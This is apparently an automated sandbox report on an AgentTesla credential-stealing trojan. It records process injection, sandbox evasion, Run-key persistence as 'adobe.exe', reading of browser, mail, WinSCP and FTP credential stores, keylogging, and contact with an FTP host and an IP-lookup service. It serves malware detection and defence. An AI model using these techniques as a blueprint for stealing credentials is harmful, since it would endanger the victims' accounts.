                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeMemory written: C:\Users\user\Desktop\x4l3iVpFSc.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeProcess created: C:\Users\user\Desktop\x4l3iVpFSc.exe "C:\Users\user\Desktop\x4l3iVpFSc.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeQueries volume information: C:\Users\user\Desktop\x4l3iVpFSc.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeQueries volume information: C:\Users\user\Desktop\x4l3iVpFSc.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0000000D.00000002.1985241633.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2441073998.0000000003017000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2441073998.000000000304A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2440123825.000000000338A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2440123825.0000000003357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1985241633.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1985241633.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2440123825.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: x4l3iVpFSc.exe PID: 7508, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 8148, type: MEMORYSTR
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: Yara matchFile source: 0000000D.00000002.1985241633.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2441073998.0000000003017000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2440123825.0000000003357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1985241633.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2440123825.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: x4l3iVpFSc.exe PID: 7508, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 8148, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0000000D.00000002.1985241633.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2441073998.0000000003017000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2441073998.000000000304A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2440123825.000000000338A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2440123825.0000000003357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1985241633.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1985241633.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2440123825.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: x4l3iVpFSc.exe PID: 7508, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 8148, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                1
                Exfiltration Over Alternative Protocol
                Abuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                111
                Process Injection
                2
                Obfuscated Files or Information
                11
                Input Capture
                24
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Registry Run Keys / Startup Folder
                1
                Scheduled Task/Job
                1
                Software Packing
                1
                Credentials in Registry
                311
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                Registry Run Keys / Startup Folder
                1
                DLL Side-Loading
                NTDS1
                Process Discovery
                Distributed Component Object Model11
                Input Capture
                23
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Masquerading
                LSA Secrets141
                Virtualization/Sandbox Evasion
                SSH1
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                Virtualization/Sandbox Evasion
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                Process Injection
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Hidden Files and Directories
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632425 Sample: x4l3iVpFSc.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 27 s4.serv00.com 2->27 29 api.ipify.org 2->29 49 Found malware configuration 2->49 51 Antivirus / Scanner detection for submitted sample 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 5 other signatures 2->55 7 x4l3iVpFSc.exe 2 2->7         started        10 adobe.exe 2 2->10         started        12 adobe.exe 2 2->12         started        signatures3 process4 signatures5 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->59 61 Injects a PE file into a foreign processes 7->61 14 x4l3iVpFSc.exe 17 4 7->14         started        19 adobe.exe 2 10->19         started        63 Antivirus detection for dropped file 12->63 65 Multi AV Scanner detection for dropped file 12->65 21 adobe.exe 14 2 12->21         started        process6 dnsIp7 31 s4.serv00.com 213.189.52.181, 21, 49688, 49692 ECO-ATMAN-PLECO-ATMAN-PL Poland 14->31 33 api.ipify.org 104.26.13.205, 443, 49687, 49691 CLOUDFLARENETUS United States 14->33 23 C:\Users\user\AppData\Roaming\...\adobe.exe, PE32 14->23 dropped 25 C:\Users\user\...\adobe.exe:Zone.Identifier, ASCII 14->25 dropped 35 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->35 37 Tries to steal Mail credentials (via file / registry access) 14->37 39 Drops executable to a common third party application directory 14->39 41 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->41 43 Tries to harvest and steal ftp login credentials 19->43 45 Tries to harvest and steal browser information (history, passwords, etc) 19->45 47 Installs a global keyboard hook 19->47 file8 signatures9

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                x4l3iVpFSc.exe64%VirustotalBrowse
                x4l3iVpFSc.exe61%ReversingLabsWin32.Trojan.AgentTesla
                x4l3iVpFSc.exe100%AviraTR/AVI.PWS.Agent.hglxv
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\Adobe\adobe.exe100%AviraTR/AVI.PWS.Agent.hglxv
                C:\Users\user\AppData\Roaming\Adobe\adobe.exe64%VirustotalBrowse
                C:\Users\user\AppData\Roaming\Adobe\adobe.exe61%ReversingLabsWin32.Trojan.AgentTesla
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                api.ipify.org
                104.26.13.205
                truefalse
                  high
                  s4.serv00.com
                  213.189.52.181
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/mgravell/protobuf-netx4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://api.ipify.orgx4l3iVpFSc.exe, 00000008.00000002.2440123825.0000000003301000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000D.00000002.1985241633.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000E.00000002.2441073998.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000E.00000002.2441073998.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://github.com/mgravell/protobuf-netix4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://stackoverflow.com/q/14436606/23354x4l3iVpFSc.exe, 00000000.00000002.1460625473.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1893124137.0000000002901000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.1982245399.0000000003045000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://account.dyn.com/x4l3iVpFSc.exe, 00000008.00000002.2440123825.0000000003301000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000D.00000002.1985241633.0000000002A91000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://github.com/mgravell/protobuf-netJx4l3iVpFSc.exe, 00000000.00000002.1470767093.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.2005831500.000000000447C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.ipify.org/tx4l3iVpFSc.exe, 00000008.00000002.2440123825.0000000003301000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000D.00000002.1985241633.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000E.00000002.2441073998.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namex4l3iVpFSc.exe, 00000000.00000002.1460625473.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, x4l3iVpFSc.exe, 00000008.00000002.2440123825.0000000003301000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1893124137.0000000002901000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.1982245399.0000000003045000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000D.00000002.1985241633.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000E.00000002.2441073998.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://stackoverflow.com/q/11564914/23354;x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://stackoverflow.com/q/2152978/23354x4l3iVpFSc.exe, 00000000.00000002.1476797367.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, adobe.exe, 00000009.00000002.1904336749.0000000003DEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://s4.serv00.comx4l3iVpFSc.exe, 00000008.00000002.2440123825.000000000338A000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000D.00000002.1985241633.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000E.00000002.2441073998.000000000304A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            104.26.13.205
                                            api.ipify.orgUnited States
                                            13335CLOUDFLARENETUSfalse
                                            213.189.52.181
                                            s4.serv00.comPoland
                                            57367ECO-ATMAN-PLECO-ATMAN-PLfalse
                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1632425
                                            Start date and time:2025-03-07 23:35:56 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 11s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:15
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:x4l3iVpFSc.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:184a555eb9e981564e4dd08321f466d1f643c6082d309a2acf6ede5add96c7cc.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@9/2@2/2
                                            EGA Information:
                                            • Successful, ratio: 83.3%
                                            HCA Information:
                                            • Successful, ratio: 95%
                                            • Number of executed functions: 430
                                            • Number of non-executed functions: 17
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.60.203.209
                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
                                            • Execution Graph export aborted for target adobe.exe, PID 7744 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                            TimeTypeDescription
                                            17:37:36API Interceptor698068x Sleep call for process: x4l3iVpFSc.exe modified
                                            17:38:19API Interceptor8793x Sleep call for process: adobe.exe modified
                                            23:37:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
                                            23:37:46AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            104.26.13.205get_txt.ps1Get hashmaliciousLummaC StealerBrowse
                                            • api.ipify.org/
                                            XkgoE6Yb52.ps1Get hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            R1TftmQpuQ.batGet hashmaliciousTargeted RansomwareBrowse
                                            • api.ipify.org/
                                            SpacesVoid Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                            • api.ipify.org/
                                            lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                            • api.ipify.org/
                                            Simple1.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            213.189.52.181kbdXtadZsM.exeGet hashmaliciousAgentTeslaBrowse
                                              NBdxPYAgZf.exeGet hashmaliciousAgentTeslaBrowse
                                                5aQpYG37db.exeGet hashmaliciousAgentTeslaBrowse
                                                  fls3eql72b.exeGet hashmaliciousAgentTeslaBrowse
                                                    SecuriteInfo.com.Win32.CrypterX-gen.18789.13214.exeGet hashmaliciousAgentTeslaBrowse
                                                      I24560875423784426VTL.exeGet hashmaliciousAgentTeslaBrowse
                                                        HBL - Invoice PIOP94893KM.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                          I2456087542378TL.exeGet hashmaliciousAgentTeslaBrowse
                                                            REF-ALYAV-QINHP5-TIS-L202299 - (AL DHAFRA) SUPPLY.exeGet hashmaliciousAgentTeslaBrowse
                                                              BSDOC-2025.exeGet hashmaliciousAgentTeslaBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                s4.serv00.comkbdXtadZsM.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                NBdxPYAgZf.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                5aQpYG37db.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                fls3eql72b.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                SecuriteInfo.com.Win32.CrypterX-gen.18789.13214.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                I24560875423784426VTL.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                HBL - Invoice PIOP94893KM.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                I2456087542378TL.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                REF-ALYAV-QINHP5-TIS-L202299 - (AL DHAFRA) SUPPLY.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                BSDOC-2025.exeGet hashmaliciousAgentTeslaBrowse
